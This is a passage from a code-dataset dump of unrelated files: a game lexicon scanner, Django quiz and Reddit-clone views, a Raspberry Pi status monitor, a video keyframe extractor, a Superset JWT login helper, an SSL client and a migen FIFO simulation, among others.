'at', 'it'],\r\n 'numbers' : [i for i in range(0, 10)]}\r\n\r\ndef getTag(word, LexiconDict):\r\n \"\"\"\r\n A Function to parse a dictionary of list-of-tokens for scanning.\r\n Return a tuple of (tag, token)\r\n \"\"\"\r\n tokenizedWord = None\r\n\r\n for key, value in LexiconDict.items():\r\n # First to see if it's a number\r\n try:\r\n int(word)\r\n tokenizedWord = ('number', int(word))\r\n except ValueError:\r\n # If it's not a number, try to see if it's within our lexicon\r\n try:\r\n if word.lower() in LexiconDict.get(key):\r\n tokenizedWord = (key, word)\r\n break\r\n # if it's all uppercase, we can assume it's an error as well\r\n elif word.upper() == word:\r\n tokenizedWord = ('error', word)\r\n break\r\n # if not, it will be a noun, some object\r\n else:\r\n tokenizedWord = ('noun', word)\r\n # if some unknown variable type is parsed\r\n except AttributeError:\r\n tokenizedWord = ('error', word)\r\n except TypeError:\r\n tokenizedWord = ('error', word)\r\n return tokenizedWord\r\n\r\n\r\ndef scan(AString):\r\n \"\"\"\r\n The scan function will take a string and tokenize it into\r\n list of string, and do the scanning based on the game_lexicon\r\n and return a list of tuples in format of (tag, token)\r\n \"\"\"\r\n listOfStrings = AString.split()\r\n\r\n listOfTags = []\r\n for i in listOfStrings:\r\n tokenTag = getTag(i, game_lexicon)\r\n listOfTags.append(tokenTag)\r\n\r\n return listOfTags\r\n","sub_path":"ex48/ex48/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"635879525","text":"from django.shortcuts import render\nfrom .TestQuizWithoutDB import *\n\n\n\ndef start(request):\n quiz = TestQuiz.quiz_dto\n return render(request, 'Quiz_app/StartScreen.html', {'quizname': quiz.title})\n\n\ndef question(request):\n if request.method == 'POST':\n if 'answer' in request.POST:\n if request.POST['c_question'] ==TestQuiz.quiz_dto.questions[TestQuiz.question_id].uuid:\n TestQuiz.question_id += 1\n answers = request.POST.getlist('answer')\n answered_question = request.POST['c_question']\n TestQuiz.answers_dto.answers.append(AnswerDTO(answered_question, answers))\n if TestQuiz.question_id < len(TestQuiz.quiz_dto.questions):\n end = False\n else:\n return result(request)\n if TestQuiz.question_id == len(TestQuiz.quiz_dto.questions)-1:\n end = True\n current_question = TestQuiz.quiz_dto.questions[TestQuiz.question_id]\n current_choices = (x for x in current_question.choices if current_question.uuid + '-' in x.uuid)\n return render(request, 'Quiz_app/QuestionPage.html', {'question': current_question,\n 'choices': current_choices,\n 'end': end})\n\n\ndef result(request):\n TestQuiz.question_id = 0\n qrs = QuizResultService(TestQuiz.quiz_dto, TestQuiz.answers_dto)\n score = qrs.get_result() * 100\n TestQuiz.answers_dto = AnswersDTO(\"1\", [])\n return render(request, 'Quiz_app/ResultPage.html', {'quizname':TestQuiz.quiz_dto.title,'score': score})\n","sub_path":"Quiz_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"568308049","text":"from Laboration6Library import *\n\n\ndef main():\n\n numberString = input(\"Ange ett tryck:\")\n unit = input(\"Från vilken sort?:\")\n pressureDict = {\"mbar\": [\"torr\", 1013],\n \"torr\": [\"pascal\", 760],\n \"pascal\": [\"atm\", 101325],\n \"atm\": [\"mbar\", 1]}\n\n while not checkIfValidSort(unit, pressureDict):\n print(\"Enheten måste matas in som en av definierade tryckenheterna (mbar, pascal, atm eller torr).\")\n unit = input(\"Försök igen: \")\n while not checkIfValidNumber(numberString):\n print(\"Trycket måste skrivas in som ett tal.\")\n numberString = input(\"Försök igen: \")\n\n number = convertToNextValue(numberString, unit, pressureDict)\n unit = nextUnit(unit, pressureDict)\n print(\"Konverterat till nästkommande tryckenhet blir trycket: \", number, unit)\n\n\nmain()","sub_path":"Laborationer/Laboration_6_copy/Laboration62.py","file_name":"Laboration62.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"190576104","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\nfrom django.views import View\n\nfrom Post.models import RedditPost, Comment\nfrom Post.forms import PostForm\n\nfrom User.models import RedditUser\n\n# Modified version of Ramon's views https://github.com/rhami223/reddit_emerald/blob/fd9ea13fc5f4775d5bfe6f52e72edd977d1ffc15/Post/views.py\n\ndef upvote_post_view(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n post.votes += 1\n post.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef downvote_post_view(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n post.votes -= 1\n post.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\n##\n\ndef upvote_comment_view(request, comment_id):\n c = Comment.objects.get(id=comment_id)\n c.votes += 1\n c.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef downvote_comment_view(request, comment_id):\n c = Comment.objects.get(id=comment_id)\n c.votes -= 1\n c.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\ndef post_detail_view(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n comments = Comment.objects.filter(on_post=post_id)\n return render(request, 'post_detail.html',{\n 'post': post,\n 'comments': comments\n })\n\nclass PostFormView(View):\n def get(self, request):\n form = PostForm()\n return render(request, \"generic_form.html\", {\"form\": form})\n \n def post(self, request):\n form = PostForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n new_post = RedditPost.objects.create(\n title=data.get('title'),\n content=data.get('content'),\n url=data.get('url'),\n subreddit_parent=data.get('subreddit_parent'),\n user_posted=request.user\n )\n redirect_url = '/post/' + str(new_post.id) + '/'\n return HttpResponseRedirect(redirect_url)\n\ndef deletePost(request, post_id):\n post = RedditPost.objects.get(id=post_id)\n post.delete()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))","sub_path":"Post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"372719157","text":" #!/usr/bin/env python3\n #coding=utf-8\n\nimport RPi.GPIO as GPIO\nimport time\nimport os\nimport threading\nimport datetime\nfrom pathlib import Path\nfrom subprocess import check_output, CalledProcessError\n\ndef check_connection(dev):\n ret = False\n path = '/sys/class/net/{}'.format(dev)\n if Path(path).exists():\n try:\n operstate = check_output(['cat', '{}/operstate'.format(path)]).decode().strip()\n except CalledProcessError as err:\n operstate = 'down'\n print('CalledProcessError:', err)\n print('operstate = {}'.format(operstate))\n try:\n carrier = check_output(['cat', '{}/carrier'.format(path)]).decode().strip()\n except CalledProcessError as err:\n carrier = '0'\n print('CalledProcessError:', err)\n print('carrier = {}'.format(carrier))\n\n if operstate == 'up' and carrier == '1':\n ret = True\n\n return ret\n\ndef check_dataflow(dev):\n ret = False\n # for EQ\n if dev == 'eth0':\n print(dev)\n p = Path('/home/rp/.data_gather/Core/connectivity.pk')\n mt = p.stat().st_mtime\n td = datetime.datetime.now() - datetime.datetime.fromtimestamp(mt)\n print('{}:{} -> {}'.format(p.name, td, td.total_seconds()))\n if td.total_seconds() > 60*2:\n ret = False\n print('overtime')\n else:\n # print('non-block')\n ret = True\n\n # for IT\n else:\n print(dev)\n for p_iter in Path('/home/rp/TypeE').iterdir():\n if p_iter.is_file():\n mt = p_iter.stat().st_mtime\n td = datetime.datetime.now() - datetime.datetime.fromtimestamp(mt)\n print('{}:{} -> {}'.format(p_iter.name, td, td.total_seconds()))\n if td.total_seconds() > 60*2:\n # print('overtime')\n ret = False\n break\n else:\n print('else')\n ret = True\n\n print('ret =', ret)\n return ret\n\n\ndef thread_job(dev, light_green, light_oragne):\n GPIO.setup(light_green, GPIO.OUT)\n GPIO.setup(light_oragne, GPIO.OUT)\n\n while 1:\n if check_connection(dev):\n if check_dataflow(dev):\n GPIO.output(light_green, GPIO.HIGH)\n time.sleep(1)\n GPIO.output(light_green, GPIO.LOW)\n GPIO.output(light_oragne, GPIO.HIGH)\n time.sleep(1)\n GPIO.output(light_oragne, GPIO.LOW)\n else:\n GPIO.output(light_green, GPIO.HIGH)\n GPIO.output(light_oragne, GPIO.HIGH)\n time.sleep(1)\n else:\n GPIO.output(light_green, GPIO.HIGH)\n GPIO.output(light_oragne, GPIO.HIGH)\n time.sleep(0.2)\n GPIO.output(light_green, GPIO.LOW)\n GPIO.output(light_oragne, GPIO.LOW)\n time.sleep(0.2)\n\nif __name__ == '__main__':\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.cleanup()\n pin_dict = {'eq_green':23, 'eq_orange':24, 'it_green':16, 'it_orange':20}\n pin_list = [pin_dict['eq_green'], pin_dict['eq_orange'], pin_dict['it_green'], pin_dict['it_orange']]\n\n thread_eq = threading.Thread(target = thread_job, args = ('eth0', pin_dict['eq_green'], pin_dict['eq_orange']))\n thread_it = threading.Thread(target = thread_job, args = ('eth1', pin_dict['it_green'], pin_dict['it_orange']))\n\n thread_eq.start()\n thread_it.start()\n\n thread_eq.join()\n thread_it.join()\n # check_dataflow('eth1')\n","sub_path":"DGM TypeE/rp/data_gather/Core/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"24342522","text":"import pickle\n\nfrom draw import *\nfrom util import *\nfrom three_hidden_rmlp import *\n\nweight_low = -0.015\nweight_high = 0.025\ninput_size = 14\nr_fc1_size = 69\nr_fc2_size = 42\nr_fc3_size = 21\nout_fc_size = 2\n\nlow = -0.95\nhigh = 0.95\ntrain_size = 6\ntarget_size = 2\nlr = 0.00225\nepoch_count = 8000\nparameters_file_name = \"../3hiddenLayer/model/model_3\"\n\n\n\ndef unpack(array: np.ndarray):\n return np.array([i[0] for i in array]), np.array([i[1] for i in array])\n\n\ndef load_model(model_path: str) -> (np.ndarray, np.ndarray, np.ndarray, float, float):\n with open(model_path, 'rb') as parameters_file:\n w1, w2, w3, stored_lr, stored_epoch_count = pickle.load(parameters_file)\n return w1, w2, w3, stored_lr, stored_epoch_count\n\n\ndef calc_metrics(outputs: np.ndarray, target: np.ndarray, type_str: str = \"test\"):\n real_g, real_kgf = unpack(target)\n model_g, model_kgf = unpack(outputs)\n rmse_g = rmse(real_g, model_g)\n rmse_kgf = rmse(real_kgf, model_kgf)\n fig_total = draw_model_real(model_g, real_g, \"g_total \" + type_str, \"iter\", \"value\", \"red\", \"green\")\n fig_kgf = draw_model_real(model_kgf, real_kgf, \"kgf \" + type_str, \"iter\", \"value\", \"red\", \"green\")\n print(type_str)\n print(\"g_total_rmse: \", rmse_g, \"%\")\n print(\"kgf_rmse: \", rmse_kgf, \"%\")\n save_param_to_html(fig_kgf, parameters_file_name, \"kgf_\" + type_str + \".html\")\n save_param_to_html(fig_total, parameters_file_name, \"total_\" + type_str + \".html\")\n\n\ndef main():\n train_input, train_target, test_input, test_target = load_data(\"../data.csv\", train_size, target_size, low, high)\n rmlp = ThreeHiddenRmlp(input_size, r_fc1_size, r_fc2_size, r_fc3_size, out_fc_size, weight_low, weight_high)\n cost_list = rmlp.fit(lr, epoch_count, list(zip(train_input, train_target)), parameters_file_name)\n train_cost = draw_cost(np.array(cost_list), \"epoch\", \"mse\", \"cost_train\")\n res, _ = rmlp.eval(list(zip(train_input, train_target)))\n res1, test_mse = rmlp.eval(list(zip(test_input, test_target)))\n test_cost = draw_cost(np.array(test_mse), \"iter\", \"mse\", \"cost_test\")\n calc_metrics(np.array(res), train_target, \"train\")\n calc_metrics(np.array(res1), test_target, \"test\")\n save_param_to_html(train_cost, parameters_file_name, \"train_cost.html\")\n save_param_to_html(test_cost, parameters_file_name, \"test_cost.html\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"rmlp/3hiddenLayer/three_main.py","file_name":"three_main.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"85080890","text":"import os\nimport cv2\nimport numpy as np\nimport time\nimport glob\nfrom PIL import Image\nimport peakutils\n\nclass KeyFramesType:\n '''\n # frame_dict\n \"source_url: \"path/to/source,\n \"frames\": \n [\n {\n \"index\": 0,\n \"at\": xx,\n \"path\": \"path/to/frame\"\n }\n ]\n '''\n def __init__(self, source_url):\n self.source_url = source_url\n self.frames_list = []\n \n def add_frame(self, frame_dict):\n self.frames_list.append(frame_dict)\nclass KeyFrameExtractor:\n \n def light_significant_change_detect(self, source, dest, thres, verbose=False):\n keyframePath = dest\n self.__prepare_dirs(keyframePath)\n\n cap = cv2.VideoCapture(source)\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n \n if (cap.isOpened()== False):\n print(\"Error opening video file\")\n\n fps = self.__get_frames_per_seconds(cap)\n interval_end = 0\n\n lastFrame = None\n cnt = 1\n\n key_frames_obj = KeyFramesType(source)\n\n for i in range(length):\n ret, frame = cap.read()\n grayframe, blur_gray = self.__convert_frame_to_grayscale(frame)\n if lastFrame is not None:\n diff = cv2.subtract(blur_gray, lastFrame)\n diffMag = cv2.countNonZero(diff)\n \n \n\n height, width = blur_gray.shape\n resolution = height * width\n if diffMag / resolution > thres:\n interval_end = i/fps\n path = os.path.join(keyframePath , 'keyframe'+ str(cnt) +'.jpg')\n cv2.imwrite(path, frame)\n frame_dict = {\n 'index': cnt,\n 'path': path,\n 'at': interval_end\n }\n \n key_frames_obj.add_frame(frame_dict)\n if(verbose):\n print(frame_dict)\n cnt += 1\n lastFrame = blur_gray\n\n cap.release()\n cv2.destroyAllWindows()\n return key_frames_obj\n\n def significant_change_detect(self, source, dest, Thres, verbose=False):\n keyframePath = dest\n self.__prepare_dirs(keyframePath)\n\n cap = cv2.VideoCapture(source)\n length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n if (cap.isOpened()== False):\n print(\"Error opening video file\")\n\n fps = self.__get_frames_per_seconds(cap)\n interval_end = 0\n key_frames_obj = KeyFramesType(source)\n\n lstfrm = []\n lstdiffMag = []\n full_color = []\n lastFrame = None\n cnt = 1\n \n # Read until video is completed\n for i in range(length):\n ret, frame = cap.read()\n grayframe, blur_gray = self.__convert_frame_to_grayscale(frame)\n\n frame_number = cap.get(cv2.CAP_PROP_POS_FRAMES) - 1\n lstfrm.append(i)\n full_color.append(frame)\n if frame_number == 0:\n lastFrame = blur_gray\n\n diff = cv2.subtract(blur_gray, lastFrame)\n diffMag = cv2.countNonZero(diff)\n lstdiffMag.append(diffMag)\n lastFrame = blur_gray\n\n if (i == length-1) or (i % 1000 == 0 and i):\n y = np.array(lstdiffMag)\n base = peakutils.baseline(y, 2)\n indices = peakutils.indexes(y-base, Thres, min_dist=1)\n \n for x in indices:\n frame_path = os.path.join(keyframePath , 'keyframe'+ str(cnt) +'.jpg') \n cv2.imwrite(frame_path, full_color[x])\n interval_end = lstfrm[x]/fps\n frame_dict = {\n 'index': cnt,\n 'path': frame_path,\n 'at': interval_end\n }\n key_frames_obj.add_frame(frame_dict)\n cnt += 1\n if(verbose):\n print(frame_dict)\n \n lstfrm = []\n lstdiffMag = []\n full_color = []\n\n cap.release()\n cv2.destroyAllWindows()\n return key_frames_obj\n \n def __get_frames_per_seconds(self, cap):\n fps = round(cap.get(cv2.CAP_PROP_FPS))\n return fps\n\n def __scale(self, img, xScale, yScale):\n res = cv2.resize(img, None, fx=xScale, fy=yScale, interpolation=cv2.INTER_AREA)\n return res\n\n\n def __crop(self, infile, height, width):\n im = Image.open(infile)\n imgwidth, imgheight = im.size\n for i in range(imgheight // height):\n for j in range(imgwidth // width):\n box = (j * width, i * height, (j + 1) * width, (i + 1) * height)\n yield im.crop(box)\n\n\n def __averagePixels(self, path):\n r, g, b = 0, 0, 0\n count = 0\n pic = Image.open(path)\n for x in range(pic.size[0]):\n for y in range(pic.size[1]):\n imgData = pic.load()\n tempr, tempg, tempb = imgData[x, y]\n r += tempr\n g += tempg\n b += tempb\n count += 1\n return (r / count), (g / count), (b / count), count\n\n\n def __convert_frame_to_grayscale(self, frame):\n grayframe = None\n gray = None\n if frame is not None:\n cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = self.__scale(gray, 1, 1)\n grayframe = self.__scale(gray, 1, 1)\n gray = cv2.GaussianBlur(gray, (9, 9), 0.0)\n return grayframe, gray\n\n\n def __prepare_dirs(self, keyframePath):\n if not os.path.exists(keyframePath):\n os.makedirs(keyframePath)\n files = glob.glob(keyframePath + \"/*\")\n for f in files:\n os.remove(f)","sub_path":"engine/keyframes.py","file_name":"keyframes.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"613215298","text":"from flask import redirect, g, flash, request,make_response,session\nfrom flask_appbuilder.security.views import UserDBModelView,AuthDBView\nfrom superset.security import SupersetSecurityManager\nfrom flask_appbuilder.security.views import expose\nfrom flask_appbuilder.security.manager import BaseSecurityManager\nfrom flask_login import login_user, logout_user\nimport jwt\nimport os\nimport educar_connection\nimport logging\nimport re\n\ndef login_or_create(appbuilder,jwt_token):\n jwt_key = os.environ.get(\"APP_JWT_KEY_EDUCAR\")\n jwt_audience = os.environ.get(\"APP_JWT_AUDIENCE_EDUCAR\")\n try:\n jwt_data = jwt.decode(jwt_token, jwt_key ,algorithms=['HS256'],verify=True,audience=jwt_audience)\n except Exception as ex:\n log.error(str(ex))\n flash('Não foi possível autenticar. JWT inválido', 'warning')\n return None\n\n user_to_use = jwt_data[\"username\"]+\"_\"+jwt_data[\"codigo_educar\"]\n user = appbuilder.sm.find_user(username=user_to_use)\n \n if user is None:\n given_name = jwt_data[\"given_name\"]\n first_name = given_name.split(\" \")[0]\n last_name = \" \".join(given_name.split(\" \")[1:])\n\n new_user = appbuilder.sm.add_user(\n username=user_to_use,\n first_name=first_name,\n last_name=last_name,\n email=jwt_data[\"email\"],\n role=appbuilder.sm.find_role(\"Educar\"),\n password=\"\".join(jwt_token[0:10])\n )\n if not new_user:\n flash('Não foi possível autenticar. Erro ao criar novo usuário', 'warning')\n return null\n user = new_user\n # user = self.appbuilder.sm.find_user(username=username)\n \n login_user(user, remember=False,force=True)\n return True\n \ncache_dict = {}\ndef DB_CONNECTION_MUTATOR(uri, params, username, security_manager, source):\n if str(uri).endswith(\"educar\"):\n # self.drivername = drivername\n # self.username = username\n # self.password_original = password\n # self.host = host\n # if port is not None:\n # self.port = int(port)\n # else:\n # self.port = None\n # self.database = database\n # self.query = query or {}\n user = security_manager.find_user(username=username)\n regex = r\"\\_(\\d+)$\"\n result = re.findall(regex,security_manager.current_user.username)\n if len(result) > 0:\n tenant_id = result[0]\n connection_info = educar_connection.get_connection_info(tenant_id)\n #if tenant_id in cache_dict:\n # connection_info = cache_dict[tenant_id]\n #else:\n # connection_info = educar_connection.get_connection_info(tenant_id)\n # cache_dict[tenant_id] = connection_info\n if connection_info:\n uri.username = connection_info[\"user\"]\n uri.password_original = connection_info[\"password\"]\n uri.host = connection_info[\"host\"]\n uri.database = connection_info[\"db\"]\n uri.port = connection_info[\"port\"]\n return uri, params","sub_path":"local_app/educar_integracao.py","file_name":"educar_integracao.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"247929322","text":"import cv2\n\nsrcImage = cv2.imread(\"1.jpg\")\ncv2.imshow(\"text_image\",srcImage)\n\ngrayImage = cv2.cvtColor(srcImage,cv2.COLOR_BGR2GRAY) #原图转为灰度图像\nedge = cv2.blur(grayImage,(3,3)) #均值滤波减噪\nedge = cv2.Canny(edge,3,9,3) #运行边缘检测算子\ncv2.imshow(\"edge_image\",edge)\n\ncv2.waitKey(5000)\n\n","sub_path":"1.基础操作/canny边缘检测.py","file_name":"canny边缘检测.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"125261374","text":"#!/usr/bin/python3\n\nimport xml.etree.ElementTree as ET\nimport datetime\nimport os\nimport json\nfrom gzip import GzipFile\nimport re\nimport pprint\n\ndef filesInDir(dirname):\n result = []\n for dirpath, dirs, files in os.walk(dirname):\n for filename in files:\n fname = os.path.join(dirpath, filename)\n result.append(fname)\n return result\n\ndef genList(tree):\n root = tree.getroot()\n\n timeFormat = '%H:%M:%S'\n maxDelta = datetime.timedelta(seconds=1)\n\n startTime = datetime.datetime.min\n strbuf = ''\n sentList = []\n\n for child in root:\n for elem in child:\n if elem.tag == 'time':\n elemID = elem.attrib['id']\n elemVal = elem.attrib['value'][:-4]\n if elemID[-1] == 'S':\n startTime = datetime.datetime.strptime(elemVal, timeFormat)\n else:\n sentList.append((strbuf.strip(), startTime, datetime.datetime.strptime(elemVal, timeFormat)))\n strbuf = ''\n else:\n try:\n strbuf = strbuf + \" \" + elem.text\n except:\n pass\n\n resultPairs = []\n for idx in range(0, len(sentList) - 1):\n cur = sentList[idx]\n nxt = sentList[idx + 1]\n if nxt[1] - cur[2] <= maxDelta and cur and nxt:\n tmp = {}\n tmp['question'] = cur[0].replace('\\\\\\'','\\'')\n tmp['answer'] = nxt[0].replace('\\\\\\'', '\\'')\n tmp['docId'] = \"OpenSubtitles\"\n tmp['qSentId'] = 20160110\n tmp['aSentId'] = 20160110\n resultPairs.append(tmp)\n return resultPairs\n\ndef getXML(filepath):\n fext = os.path.splitext(filepath)[1]\n if fext == '.gz':\n tmp = GzipFile(filename=filepath)\n return ET.parse(tmp)\n else:\n return ET.parse(filepath)\n\ndef genForDir(dirname):\n pat = re.compile('\\\\.xml.*', re.DOTALL)\n\n dirList = filesInDir(dirname)\n for filepath in dirList:\n outputName = 'json' + re.sub(pat, '.json', filepath[1:])\n try:\n doc = getXML(filepath)\n result = genList(doc)\n if not os.path.exists(os.path.dirname(outputName)):\n os.makedirs(os.path.dirname(outputName))\n with open(outputName, 'w') as outputFile:\n json.dump(result, outputFile)\n print(outputName + \" written from \" + filepath)\n except:\n pass\n\n\n\na = datetime.datetime.now()\ndirtest = './en/'\ngenForDir(dirtest)\nb = datetime.datetime.now()\nprint('\\nTotal time:')\nprint(b - a)\n\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"629759233","text":"#!/usr/bin/env python3\n\nimport os\nimport math\nimport sys\nimport re\npath = os.path.abspath('day5.txt')\n\nwith open(path) as f:\n content = f.readlines()\n# you may also want to remove whitespace characters like `\\n` at the end of each line\ncontent = [x.split() for x in content]\nprint(content)\n\nticket = -sys.maxsize\n\nfor i in range(len(content)):\n\n #import pudb;pu.db \n row_chars = content[i][0][:7]\n col_chars = content[i][0][7:]\n row_start = 0\n row_end = 127\n col_start = 0\n col_end = 7\n for i in range(len(row_chars)):\n val = row_chars[i]\n if val == \"F\":\n row_end = (row_end+row_start)//2\n elif val == \"B\":\n row_start = (row_end+row_start+1)//2\n row = row_end\n for val in col_chars:\n if val == \"L\":\n col_end = (col_end+col_start)//2\n elif val == \"R\":\n col_start = (col_end+col_start+1)//2\n col = col_end\n print(row,col)\n ticket_id = row*8 + col\n if ticket_id > ticket:\n ticket = ticket_id\n\nprint(ticket)\n \n\n","sub_path":"advent-of-code-20/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"370531259","text":"#Timothy Gallagher\n#IST 411 Section 001\n#W7 Solo SSL Lab\n#October 13, 2019\n\nimport ssl\nimport json\nimport socket\n\nwith open('jsonCar.json') as jsonPayload:\n datajson = json.load(jsonPayload)\nuserDataEncoded = (json.dumps(datajson)).encode('utf-8').strip()\n\n\ntry:\n\tprint(\"Client Connecting using port 8080...\")\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tssl_sock = ssl.wrap_socket(s,\n\t\tca_certs=\"server.crt\",\n\t\tcert_reqs=ssl.CERT_REQUIRED)\n\tssl_sock.connect(('localhost', 8080))\n\tprint(\"sending \"+ userDataEncoded.decode(\"UTF-8\"))\n\tssl_sock.sendall(userDataEncoded)\nexcept Exception as e:\n\tprint(e)\n#\tprint(ssl_sock.cipher())\n#\tssl_sock.close()\n","sub_path":"clientssl2.py","file_name":"clientssl2.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"36475708","text":"\nimport os\nimport sys\nfrom migen import *\nfrom litex.build.generic_platform import *\nfrom litex.build.xilinx import XilinxPlatform\n\nfrom migen.genlib.io import CRG\n\nsys.path.append(\"/home/diegoaranda/Documents/Tesis/FIFO\")\nfrom asyncfifo import AsyncFIFO\n\n\n_io = [ #generic_platform\n (\"write_clk\", 0,\n Subsignal(\"p\", Pins(\"X\")),\n Subsignal(\"n\", Pins(\"X\"))\n ),\n (\"din\",0, \n Subsignal(\"a\", Pins(\"X\")),\n Subsignal(\"b\", Pins(\"X\")),\n Subsignal(\"c\", Pins(\"X\")),\n Subsignal(\"d\", Pins(\"X\"))\n ),\n (\"readable\",0, Pins(\"X\")),\n (\"writable\",0, Pins(\"X\")),\n (\"re\",0, Pins(\"X\")),\n (\"we\",0, Pins(\"X\"))\n \n]\n\n\nclass Platform(XilinxPlatform):\n def __init__(self):\n XilinxPlatform.__init__(self, \"\", _io)\n\n\nclass GTPSim(Module):\n def __init__(self, platform):\n write_clk = Signal()\n read_clk=Signal()\n\n self.submodules.crg = CRG(write_clk)\n \n \n write_clk100 = Signal()\n write_clk100_pads = platform.request(\"write_clk\")\n self.specials += [\n Instance(\"IBUFDS_GTE2\",\n i_CEB=0,\n i_I=write_clk100_pads.p,\n i_IB=write_clk100_pads.n,\n o_O=write_clk100),\n Instance(\"BUFG\", i_I=write_clk100, o_O=write_clk)\n ]\n \n \n pll_fb = Signal()\n self.specials += [\n Instance(\"PLLE2_BASE\",\n p_STARTUP_WAIT=\"FALSE\", #o_LOCKED=,\n\n # VCO @ 1GHz\n p_REF_JITTER1=0.01, p_CLKIN1_PERIOD=10.0,\n p_CLKFBOUT_MULT=10, p_DIVCLK_DIVIDE=1,\n i_CLKIN1=write_clk, i_CLKFBIN=pll_fb, o_CLKFBOUT=pll_fb,\n\n # 200MHz\n p_CLKOUT0_DIVIDE=5, p_CLKOUT0_PHASE=0.0, o_CLKOUT0=read_clk\n ),\n ]\n \n async_fifo=AsyncFIFO(width=8, depth=8)\n self.submodules+=async_fifo\n self.din=Signal(4)\n self.writable=Signal()\n self.readable=Signal()\n self.we=Signal()\n self.re=Signal()\n \n self.din=platform.request(\"din\")\n self.writable=platform.request(\"writable\")\n self.readable=platform.request(\"readable\")\n self.we=platform.request(\"we\")\n self.re=platform.request(\"re\")\n \n\n async_fifo=ClockDomainsRenamer({\"write\": \"sys\", \n \"read\":\"user_domain\"})(async_fifo)\n\n self.clock_domains.cd_read=ClockDomain(name=\"user_domain\")\n self.clock_domains.cd_read_por = ClockDomain(reset_less=True)\n \n\n int_read_rst = Signal(reset=1)\n self.sync.read_por += int_read_rst.eq(0)\n self.comb += [\n self.cd_read.clk.eq(read_clk),\n self.cd_read.rst.eq(int_read_rst),\n self.cd_read_por.clk.eq(read_clk),\n ]\n\n self.comb+=[\n async_fifo.din.eq(Cat(self.din.a,self.din.b,self.din.c,self.din.d,)),\n self.readable.eq(async_fifo.readable),\n self.writable.eq(async_fifo.writable),\n async_fifo.re.eq(self.re),\n async_fifo.we.eq(self.we)\n \n ]\n\n\n \n\n \ndef generate_top():\n platform = Platform()\n soc = GTPSim(platform)\n platform.build(soc, build_dir=\"./\", run=False)\n\ndef generate_top_tb():\n f = open(\"top_tb.v\", \"w\")\n f.write(\"\"\"\n`timescale 1ns/1ps\n\nmodule top_tb();\n\nreg write_clk;\ninitial write_clk = 1'b1;\nalways #5 write_clk = ~write_clk;\n\nreg[3:0] counter;\ninitial counter=4'b0; \n\nreg din_a, din_b, din_c, din_d;\n\nreg we, re;\ninitial we=0;\ninitial re=0;\n\nwire writable;\n\ntop dut (\n .write_clk_p(write_clk),\n .write_clk_n(~write_clk),\n .din_a(din_a),\n .din_b(din_b),\n .din_c(din_c),\n .din_d(din_d),\n .we(we),\n .writable(writable),\n .re(re)\n);\nreg bandera;\ninitial bandera=0;\ninitial begin\n for (integer i=0;i<=37;i=i+1) begin\n #10;\n end\n bandera=1;\nend\n\nalways @(posedge write_clk)\nbegin \n if (bandera) begin \n if(writable && counter<=7) begin\n counter=counter+1;\n we=1;\n re=0;\n din_a=counter[0];\n din_b=counter[1];\n din_c=counter[2];\n din_d=counter[3];\n end else begin\n we=0;\n re=1;\n end\n end\n\n\nend\n\n\n\nendmodule\"\"\")\n f.close()\n\ndef run_sim():\n os.system(\"rm -rf xsim.dir\")\n os.system(\"xvlog glbl.v\")\n os.system(\"xvlog top.v\")\n os.system(\"xvlog top_tb.v\")\n os.system(\"xelab -debug typical top_tb glbl -s top_tb_sim -L unisims_ver -L unimacro_ver -L SIMPRIM_VER -L secureip -L $xsimdir/xil_defaultlib -timescale 1ns/1ps\")\n os.system(\"xsim top_tb_sim -gui\")\n\ndef main():\n generate_top()\n generate_top_tb()\n run_sim()\n\nif __name__ == \"__main__\":\n 